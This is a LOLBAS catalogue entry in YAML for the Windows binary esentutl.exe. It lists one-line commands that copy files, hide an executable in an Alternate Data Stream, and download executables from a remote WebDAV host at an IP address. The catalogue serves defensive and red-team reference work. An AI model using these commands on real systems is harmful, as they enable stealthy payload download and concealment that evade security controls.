LOLBAS/yml/OSBinaries/Esentutl.yml

29 lines
1.3 KiB
YAML

---
Name: Esentutl.exe
Description: Copy, Download, Write ADS, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Description: Copies the source EXE to the destination EXE file.
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Description: Copies the source EXE to the destination EXE file
Full Path:
- c:\windows\system32\esentutl.exe
- c:\windows\sysWOW64\esentutl.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to egre55 - @egre55